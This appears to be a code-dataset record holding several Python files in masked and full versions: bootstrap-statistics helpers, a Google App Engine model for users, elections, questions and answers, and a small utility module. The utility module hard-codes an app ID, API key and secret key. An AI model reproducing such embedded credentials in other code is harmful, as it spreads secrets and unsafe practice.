def generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):
"""
Yield samples that match the sizes given in test_set_sizes
"""
for sample_idx, sample_size in zip(range(num_samples), cycle(
test_set_sizes)):
yield random.sample(test_universe, sample_size)
def calculate_bootstrap_statistics(samples, statistic):
"""Calculate the bootstrap statistics for the samples."""
stats = list(map(statistic, samples))
stats.sort()
return stats
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len
(bootstrap_stats))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from itertools import cycle
import random
import bisect
def generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):
"""
Yield samples that match the sizes given in test_set_sizes
"""
for sample_idx, sample_size in zip(range(num_samples), cycle(
test_set_sizes)):
yield random.sample(test_universe, sample_size)
def calculate_bootstrap_statistics(samples, statistic):
"""Calculate the bootstrap statistics for the samples."""
stats = list(map(statistic, samples))
stats.sort()
return stats
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len
(bootstrap_stats))
<|reserved_special_token_1|>
#
# Copyright John Reid 2009
#
"""
Code to handle bootstrap analyses.
"""
from itertools import cycle
import random
import bisect
def generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):
    """Produce up to *num_samples* random subsets of *test_universe*, taking
    each sample's size from *test_set_sizes* in round-robin order."""
    if not test_set_sizes:
        # Cycling an empty sequence yields no sizes, hence no samples.
        return
    size_source = cycle(test_set_sizes)
    for _ in range(num_samples):
        yield random.sample(test_universe, next(size_source))
def calculate_bootstrap_statistics(samples, statistic):
    """Apply *statistic* to each sample and return the values in sorted order."""
    return sorted(statistic(sample) for sample in samples)
def bootstrap_p_value(bootstrap_stats, stat_value):
"""
Calculate the p-value for the statistic's value given the bootstrap values.
"""
return 1. - bisect.bisect_left(bootstrap_stats, stat_value) / float(len(bootstrap_stats))
|
flexible
|
{
"blob_id": "752affdfa1481b9a19a9b7dfe76f9d5d11c80073",
"index": 4678,
"step-1": "<mask token>\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len\n (bootstrap_stats))\n",
"step-2": "<mask token>\n\n\ndef generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):\n \"\"\"\n Yield samples that match the sizes given in test_set_sizes\n \"\"\"\n for sample_idx, sample_size in zip(range(num_samples), cycle(\n test_set_sizes)):\n yield random.sample(test_universe, sample_size)\n\n\n<mask token>\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len\n (bootstrap_stats))\n",
"step-3": "<mask token>\n\n\ndef generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):\n \"\"\"\n Yield samples that match the sizes given in test_set_sizes\n \"\"\"\n for sample_idx, sample_size in zip(range(num_samples), cycle(\n test_set_sizes)):\n yield random.sample(test_universe, sample_size)\n\n\ndef calculate_bootstrap_statistics(samples, statistic):\n \"\"\"Calculate the bootstrap statistics for the samples.\"\"\"\n stats = list(map(statistic, samples))\n stats.sort()\n return stats\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len\n (bootstrap_stats))\n",
"step-4": "<mask token>\nfrom itertools import cycle\nimport random\nimport bisect\n\n\ndef generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):\n \"\"\"\n Yield samples that match the sizes given in test_set_sizes\n \"\"\"\n for sample_idx, sample_size in zip(range(num_samples), cycle(\n test_set_sizes)):\n yield random.sample(test_universe, sample_size)\n\n\ndef calculate_bootstrap_statistics(samples, statistic):\n \"\"\"Calculate the bootstrap statistics for the samples.\"\"\"\n stats = list(map(statistic, samples))\n stats.sort()\n return stats\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1.0 - bisect.bisect_left(bootstrap_stats, stat_value) / float(len\n (bootstrap_stats))\n",
"step-5": "#\n# Copyright John Reid 2009\n#\n\n\n\"\"\"\nCode to handle bootstrap analyses.\n\"\"\"\n\nfrom itertools import cycle\nimport random\nimport bisect\n\n\ndef generate_bootstrap_samples(num_samples, test_universe, test_set_sizes):\n \"\"\"\n Yield samples that match the sizes given in test_set_sizes\n \"\"\"\n for sample_idx, sample_size in zip(range(num_samples), cycle(test_set_sizes)):\n yield random.sample(test_universe, sample_size)\n\n\ndef calculate_bootstrap_statistics(samples, statistic):\n \"Calculate the bootstrap statistics for the samples.\"\n stats = list(map(statistic, samples))\n stats.sort()\n return stats\n\n\ndef bootstrap_p_value(bootstrap_stats, stat_value):\n \"\"\"\n Calculate the p-value for the statistic's value given the bootstrap values.\n \"\"\"\n return 1. - bisect.bisect_left(bootstrap_stats, stat_value) / float(len(bootstrap_stats))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
__author__ = 'Chitrang'
from google.appengine.api import memcache
from google.appengine.ext import db
import logging
import os
import jinja2
class User(db.Model):
    """Datastore model for a user account.

    Stores profile/auth data, email-verification state and, for each
    committee post, the user's vote plus a per-post vote counter.
    """

    # Identity / profile.
    id = db.StringProperty(required=True)
    created = db.DateTimeProperty(auto_now_add=True)
    updated = db.DateTimeProperty(auto_now=True)
    name = db.StringProperty(required=True)
    profile_url = db.StringProperty(required=True)
    access_token = db.StringProperty(required=True)
    email = db.StringProperty(required=False)
    penn_id = db.StringProperty(required=False)
    email_verified = db.BooleanProperty(required=True)
    verification_code = db.StringProperty(required=True)

    # Posts: the candidate this user voted for, per committee position.
    chair = db.StringProperty(required=False)
    vicechair = db.StringProperty(required=False)
    treasurer = db.StringProperty(required=False)
    socialchair = db.StringProperty(required=False)
    operationschair = db.StringProperty(required=False)
    gapsaliason = db.StringProperty(required=False)
    communicationschair = db.StringProperty(required=False)
    webadmin = db.StringProperty(required=False)
    marketingchair = db.StringProperty(required=False)

    # Counts: votes received by this user, per committee position.
    chair_count = db.IntegerProperty(required=False, default=0)
    vicechair_count = db.IntegerProperty(required=False, default=0)
    treasurer_count = db.IntegerProperty(required=False, default=0)
    socialchair_count = db.IntegerProperty(required=False, default=0)
    operationschair_count = db.IntegerProperty(required=False, default=0)
    gapsaliason_count = db.IntegerProperty(required=False, default=0)
    communicationschair_count = db.IntegerProperty(required=False, default=0)
    webadmin_count = db.IntegerProperty(required=False, default=0)
    marketingchair_count = db.IntegerProperty(required=False, default=0)

    @classmethod
    def all_data(cls):
        """Return every User entity as a list.

        Bug fix: the query was built from the adjacent literals
        "SELECT *" "FROM User", which concatenate to the invalid GQL
        "SELECT *FROM User" (missing space before FROM).
        """
        all_data = db.GqlQuery("SELECT * FROM User")
        return list(all_data)

    @classmethod
    def set_email(cls, id, email):
        """Attach *email* (and the penn id derived from it) to user *id*."""
        user = User.get_by_key_name(id)
        penn_id = email.split("@")[0]
        user.email = email
        user.penn_id = penn_id
        user.put()

    @classmethod
    def is_email_verified(cls, email):
        """Return True iff *email* belongs to a user whose email is verified."""
        data = User.all_data()
        # all_data() returns a list, so this guard is always taken; kept
        # for backward compatibility with the original control flow.
        if data is not None:
            all_emails = {user.email: user.email_verified for user in data}
            logging.info("all email information " + str(all_emails))
            return all_emails.get(email, False)

    @classmethod
    def is_pennid_verified(cls, email):
        """Return True iff the penn-id part of *email* belongs to a verified user."""
        penn_id = email.split("@")[0]
        all_data = User.all_data()
        if all_data is not None:
            all_penn_ids = {user.penn_id: user.email_verified for user in all_data}
            logging.info("all penn id information" + str(all_penn_ids))
            return all_penn_ids.get(penn_id, False)
class Answer(db.Model):
    """An answer to a Question, with a record of which users upvoted it."""

    answer = db.TextProperty(required=True)
    answered_by = db.StringProperty(required=True)
    answerer_name = db.StringProperty(required=True)
    upvoted_by = db.ListProperty(str)

    def get_votes(self):
        """Return how many users have upvoted this answer."""
        return len(self.upvoted_by)

    def get_upvote_link(self):
        """Return the relative URL that upvotes this answer."""
        answer_id = self.key().id()
        return "/q/question/upvote/%s" % answer_id
def render_str(template, **params):
    """Render *template* (looked up in ./templates) with *params* via Jinja2."""
    template_dir = os.path.join(os.path.dirname(__file__), 'templates')
    environment = jinja2.Environment(
        loader=jinja2.FileSystemLoader(template_dir), autoescape=True)
    return environment.get_template(template).render(params)
class Question(db.Model):
    """A question posted by a user, holding keys of its Answer entities."""

    question = db.TextProperty(required=True)
    created = db.DateTimeProperty(auto_now_add=True)
    last_modified = db.DateTimeProperty(auto_now=True)
    answers = db.ListProperty(item_type=db.Key, required=True)
    asked_by = db.StringProperty(required=True)
    asker_name = db.StringProperty(required=True)

    def render(self):
        """Render this question through the question.html template."""
        self._render_text = self.question.replace('\n', '<br>')
        return render_str("question.html", q=self)

    def as_dict(self):
        """Return a JSON-serialisable dict view of this question."""
        time_fmt = '%c'
        return {
            'question': self.question,
            'created': self.created.strftime(time_fmt),
            'last_modified': self.last_modified.strftime(time_fmt),
        }

    def link(self):
        """Return the relative permalink for this question."""
        qid = self.key().id()
        return "/q/question/%s" % str(qid)
|
normal
|
{
"blob_id": "0b2bc19aea9393562f79df026bc17513e25c6604",
"index": 8535,
"step-1": "<mask token>\n\n\nclass User(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery('SELECT *FROM User')\n return list(all_data)\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split('@')[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = {user.email: user.email_verified for user in data}\n logging.info('all email information ' + str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split('@')[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in\n all_data}\n logging.info('all penn id information' + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return '/q/question/upvote/%s' % self.key().id()\n\n\n<mask token>\n\n\nclass Question(db.Model):\n question = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n last_modified = db.DateTimeProperty(auto_now=True)\n answers = db.ListProperty(item_type=db.Key, required=True)\n asked_by = db.StringProperty(required=True)\n 
asker_name = db.StringProperty(required=True)\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str('question.html', q=self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question, 'created': self.created.strftime(\n time_fmt), 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = '/q/question/%s' % str(qid)\n return href_link\n",
"step-2": "<mask token>\n\n\nclass User(db.Model):\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n email = db.StringProperty(required=False)\n penn_id = db.StringProperty(required=False)\n email_verified = db.BooleanProperty(required=True)\n verification_code = db.StringProperty(required=True)\n chair = db.StringProperty(required=False)\n vicechair = db.StringProperty(required=False)\n treasurer = db.StringProperty(required=False)\n socialchair = db.StringProperty(required=False)\n operationschair = db.StringProperty(required=False)\n gapsaliason = db.StringProperty(required=False)\n communicationschair = db.StringProperty(required=False)\n webadmin = db.StringProperty(required=False)\n marketingchair = db.StringProperty(required=False)\n chair_count = db.IntegerProperty(required=False, default=0)\n vicechair_count = db.IntegerProperty(required=False, default=0)\n treasurer_count = db.IntegerProperty(required=False, default=0)\n socialchair_count = db.IntegerProperty(required=False, default=0)\n operationschair_count = db.IntegerProperty(required=False, default=0)\n gapsaliason_count = db.IntegerProperty(required=False, default=0)\n communicationschair_count = db.IntegerProperty(required=False, default=0)\n webadmin_count = db.IntegerProperty(required=False, default=0)\n marketingchair_count = db.IntegerProperty(required=False, default=0)\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery('SELECT *FROM User')\n return list(all_data)\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split('@')[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = 
{user.email: user.email_verified for user in data}\n logging.info('all email information ' + str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split('@')[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in\n all_data}\n logging.info('all penn id information' + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return '/q/question/upvote/%s' % self.key().id()\n\n\n<mask token>\n\n\nclass Question(db.Model):\n question = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n last_modified = db.DateTimeProperty(auto_now=True)\n answers = db.ListProperty(item_type=db.Key, required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str('question.html', q=self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question, 'created': self.created.strftime(\n time_fmt), 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = '/q/question/%s' % str(qid)\n return href_link\n",
"step-3": "<mask token>\n\n\nclass User(db.Model):\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n email = db.StringProperty(required=False)\n penn_id = db.StringProperty(required=False)\n email_verified = db.BooleanProperty(required=True)\n verification_code = db.StringProperty(required=True)\n chair = db.StringProperty(required=False)\n vicechair = db.StringProperty(required=False)\n treasurer = db.StringProperty(required=False)\n socialchair = db.StringProperty(required=False)\n operationschair = db.StringProperty(required=False)\n gapsaliason = db.StringProperty(required=False)\n communicationschair = db.StringProperty(required=False)\n webadmin = db.StringProperty(required=False)\n marketingchair = db.StringProperty(required=False)\n chair_count = db.IntegerProperty(required=False, default=0)\n vicechair_count = db.IntegerProperty(required=False, default=0)\n treasurer_count = db.IntegerProperty(required=False, default=0)\n socialchair_count = db.IntegerProperty(required=False, default=0)\n operationschair_count = db.IntegerProperty(required=False, default=0)\n gapsaliason_count = db.IntegerProperty(required=False, default=0)\n communicationschair_count = db.IntegerProperty(required=False, default=0)\n webadmin_count = db.IntegerProperty(required=False, default=0)\n marketingchair_count = db.IntegerProperty(required=False, default=0)\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery('SELECT *FROM User')\n return list(all_data)\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split('@')[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = 
{user.email: user.email_verified for user in data}\n logging.info('all email information ' + str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split('@')[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in\n all_data}\n logging.info('all penn id information' + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return '/q/question/upvote/%s' % self.key().id()\n\n\ndef render_str(template, **params):\n template_dir = os.path.join(os.path.dirname(__file__), 'templates')\n jinja_environment = jinja2.Environment(loader=jinja2.FileSystemLoader(\n template_dir), autoescape=True)\n t = jinja_environment.get_template(template)\n return t.render(params)\n\n\nclass Question(db.Model):\n question = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n last_modified = db.DateTimeProperty(auto_now=True)\n answers = db.ListProperty(item_type=db.Key, required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str('question.html', q=self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question, 'created': self.created.strftime(\n time_fmt), 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = '/q/question/%s' % str(qid)\n return href_link\n",
"step-4": "__author__ = 'Chitrang'\n<mask token>\n\n\nclass User(db.Model):\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n email = db.StringProperty(required=False)\n penn_id = db.StringProperty(required=False)\n email_verified = db.BooleanProperty(required=True)\n verification_code = db.StringProperty(required=True)\n chair = db.StringProperty(required=False)\n vicechair = db.StringProperty(required=False)\n treasurer = db.StringProperty(required=False)\n socialchair = db.StringProperty(required=False)\n operationschair = db.StringProperty(required=False)\n gapsaliason = db.StringProperty(required=False)\n communicationschair = db.StringProperty(required=False)\n webadmin = db.StringProperty(required=False)\n marketingchair = db.StringProperty(required=False)\n chair_count = db.IntegerProperty(required=False, default=0)\n vicechair_count = db.IntegerProperty(required=False, default=0)\n treasurer_count = db.IntegerProperty(required=False, default=0)\n socialchair_count = db.IntegerProperty(required=False, default=0)\n operationschair_count = db.IntegerProperty(required=False, default=0)\n gapsaliason_count = db.IntegerProperty(required=False, default=0)\n communicationschair_count = db.IntegerProperty(required=False, default=0)\n webadmin_count = db.IntegerProperty(required=False, default=0)\n marketingchair_count = db.IntegerProperty(required=False, default=0)\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery('SELECT *FROM User')\n return list(all_data)\n\n @classmethod\n def set_email(cls, id, email):\n user = User.get_by_key_name(id)\n penn_id = email.split('@')[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not 
None:\n all_emails = {user.email: user.email_verified for user in data}\n logging.info('all email information ' + str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split('@')[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in\n all_data}\n logging.info('all penn id information' + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return '/q/question/upvote/%s' % self.key().id()\n\n\ndef render_str(template, **params):\n template_dir = os.path.join(os.path.dirname(__file__), 'templates')\n jinja_environment = jinja2.Environment(loader=jinja2.FileSystemLoader(\n template_dir), autoescape=True)\n t = jinja_environment.get_template(template)\n return t.render(params)\n\n\nclass Question(db.Model):\n question = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n last_modified = db.DateTimeProperty(auto_now=True)\n answers = db.ListProperty(item_type=db.Key, required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str('question.html', q=self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question, 'created': self.created.strftime(\n time_fmt), 'last_modified': self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = '/q/question/%s' % str(qid)\n return href_link\n",
"step-5": "__author__ = 'Chitrang'\n\nfrom google.appengine.api import memcache\nfrom google.appengine.ext import db\nimport logging\nimport os\nimport jinja2\n\nclass User(db.Model):\n\n id = db.StringProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n updated = db.DateTimeProperty(auto_now=True)\n name = db.StringProperty(required=True)\n profile_url = db.StringProperty(required=True)\n access_token = db.StringProperty(required=True)\n email = db.StringProperty(required=False)\n penn_id = db.StringProperty(required=False)\n email_verified = db.BooleanProperty(required=True)\n verification_code = db.StringProperty(required=True)\n\n #posts\n chair = db.StringProperty(required=False)\n vicechair = db.StringProperty(required=False)\n treasurer = db.StringProperty(required=False)\n socialchair = db.StringProperty(required=False)\n operationschair = db.StringProperty(required=False)\n gapsaliason = db.StringProperty(required=False)\n communicationschair = db.StringProperty(required=False)\n webadmin = db.StringProperty(required=False)\n marketingchair = db.StringProperty(required=False)\n\n #counts\n chair_count = db.IntegerProperty(required=False, default=0)\n vicechair_count = db.IntegerProperty(required=False, default=0)\n treasurer_count = db.IntegerProperty(required=False, default=0)\n socialchair_count = db.IntegerProperty(required=False, default=0)\n operationschair_count = db.IntegerProperty(required=False, default=0)\n gapsaliason_count = db.IntegerProperty(required=False, default=0)\n communicationschair_count = db.IntegerProperty(required=False, default=0)\n webadmin_count = db.IntegerProperty(required=False, default=0)\n marketingchair_count = db.IntegerProperty(required=False, default=0)\n\n @classmethod\n def all_data(cls):\n all_data = db.GqlQuery(\"SELECT *\"\n \"FROM User\")\n return list(all_data)\n #logging.info(\"updating cache\")\n #memcache.set('users', list(all_data))\n\n @classmethod\n def set_email(cls, id, email):\n 
user = User.get_by_key_name(id)\n penn_id = email.split(\"@\")[0]\n user.email = email\n user.penn_id = penn_id\n user.put()\n #User.update_cache()\n\n @classmethod\n def is_email_verified(cls, email):\n data = User.all_data()\n if data is not None:\n all_emails = {user.email : user.email_verified for user in data}\n logging.info(\"all email information \"+ str(all_emails))\n return all_emails.get(email, False)\n\n @classmethod\n def is_pennid_verified(cls, email):\n penn_id = email.split(\"@\")[0]\n all_data = User.all_data()\n if all_data is not None:\n all_penn_ids = {user.penn_id: user.email_verified for user in all_data}\n logging.info(\"all penn id information\" + str(all_penn_ids))\n return all_penn_ids.get(penn_id, False)\n\n\n\nclass Answer(db.Model):\n answer = db.TextProperty(required=True)\n answered_by = db.StringProperty(required=True)\n answerer_name = db.StringProperty(required=True)\n upvoted_by = db.ListProperty(str)\n\n def get_votes(self):\n return len(self.upvoted_by)\n\n def get_upvote_link(self):\n return \"/q/question/upvote/%s\"%self.key().id()\n\ndef render_str(template, **params):\n template_dir = os.path.join(os.path.dirname(__file__), 'templates')\n jinja_environment = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),\n autoescape = True)\n t = jinja_environment.get_template(template)\n return t.render(params)\n\n\nclass Question(db.Model):\n question = db.TextProperty(required = True)\n created = db.DateTimeProperty(auto_now_add = True)\n last_modified = db.DateTimeProperty(auto_now = True)\n answers = db.ListProperty(item_type=db.Key,required=True)\n asked_by = db.StringProperty(required=True)\n asker_name = db.StringProperty(required=True)\n\n\n def render(self):\n self._render_text = self.question.replace('\\n', '<br>')\n return render_str(\"question.html\", q = self)\n\n def as_dict(self):\n time_fmt = '%c'\n d = {'question': self.question,\n 'created': self.created.strftime(time_fmt),\n 'last_modified': 
self.last_modified.strftime(time_fmt)}\n return d\n\n def link(self):\n qid = self.key().id()\n href_link = \"/q/question/%s\"%str(qid)\n return href_link\n\n",
"step-ids": [
14,
15,
16,
17,
19
]
}
|
[
14,
15,
16,
17,
19
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
i = 1
<|reserved_special_token_1|>
# i change it for change1
# change 1.py in master
i = 1
# fix bug for boss
|
flexible
|
{
"blob_id": "92f4f1c8a4e04b07ed7c05d5bb733c0b9c28bd05",
"index": 5325,
"step-1": "<mask token>\n",
"step-2": "i = 1\n",
"step-3": "# i change it for change1\n# change 1.py in master\ni = 1\n# fix bug for boss\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def print_json(obj):
"""json格式打印信息
Args:
obj 待打印的对象信息
"""
print(json.dumps(obj, ensure_ascii=False))
def print_error(err_code, err_msg):
"""格式化打印错误信息
Args:
err_code: 错误码
err_msg: 错误信息
"""
print(u'[{0}]: {1}'.format(err_code, err_msg))
def get_image_base64_content(image_file):
"""获取图片base64编码信息
Args:
image_file: 图片
Returns:
base64编码的图片信息
"""
with open(image_file, 'rb') as fp:
return str(base64.b64encode(fp.read()), 'utf-8')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
APP_ID = '10676432'
API_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'
SECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'
def print_json(obj):
"""json格式打印信息
Args:
obj 待打印的对象信息
"""
print(json.dumps(obj, ensure_ascii=False))
def print_error(err_code, err_msg):
"""格式化打印错误信息
Args:
err_code: 错误码
err_msg: 错误信息
"""
print(u'[{0}]: {1}'.format(err_code, err_msg))
def get_image_base64_content(image_file):
"""获取图片base64编码信息
Args:
image_file: 图片
Returns:
base64编码的图片信息
"""
with open(image_file, 'rb') as fp:
return str(base64.b64encode(fp.read()), 'utf-8')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import json
import base64
APP_ID = '10676432'
API_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'
SECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'
def print_json(obj):
"""json格式打印信息
Args:
obj 待打印的对象信息
"""
print(json.dumps(obj, ensure_ascii=False))
def print_error(err_code, err_msg):
"""格式化打印错误信息
Args:
err_code: 错误码
err_msg: 错误信息
"""
print(u'[{0}]: {1}'.format(err_code, err_msg))
def get_image_base64_content(image_file):
"""获取图片base64编码信息
Args:
image_file: 图片
Returns:
base64编码的图片信息
"""
with open(image_file, 'rb') as fp:
return str(base64.b64encode(fp.read()), 'utf-8')
<|reserved_special_token_1|>
#coding=utf-8
#
"""
my custom common module
"""
import json
import base64
# SDK account credentials.
# NOTE(review): secrets are hard-coded in source; move them to configuration
# or environment variables and rotate these keys.
APP_ID = '10676432'
API_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'
SECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'
def print_json(obj):
    """Print *obj* serialised as JSON, keeping non-ASCII characters readable.

    Args:
        obj: the object to serialise and print.
    """
    serialised = json.dumps(obj, ensure_ascii=False)
    print(serialised)
def print_error(err_code, err_msg):
    """Print an error in the standard "[code]: message" format.

    Args:
        err_code: the error code.
        err_msg: the error message.
    """
    formatted = u"[{0}]: {1}".format(err_code, err_msg)
    print(formatted)
def get_image_base64_content(image_file):
    """Return the contents of *image_file* as a base64-encoded string.

    Args:
        image_file: path to the image file.

    Returns:
        The file contents, base64-encoded and decoded to a utf-8 str.
    """
    with open(image_file, 'rb') as handle:
        raw = handle.read()
    return str(base64.b64encode(raw), 'utf-8')
|
flexible
|
{
"blob_id": "0b0eebd31d822ff5c1b951c3ee213f58a3a13aa0",
"index": 134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef print_json(obj):\n \"\"\"json格式打印信息\n\n Args:\n obj 待打印的对象信息\n \"\"\"\n print(json.dumps(obj, ensure_ascii=False))\n\n\ndef print_error(err_code, err_msg):\n \"\"\"格式化打印错误信息\n\n Args:\n err_code: 错误码\n err_msg: 错误信息\n \"\"\"\n print(u'[{0}]: {1}'.format(err_code, err_msg))\n\n\ndef get_image_base64_content(image_file):\n \"\"\"获取图片base64编码信息\n\n Args:\n image_file: 图片\n\n Returns:\n base64编码的图片信息\n \"\"\"\n with open(image_file, 'rb') as fp:\n return str(base64.b64encode(fp.read()), 'utf-8')\n",
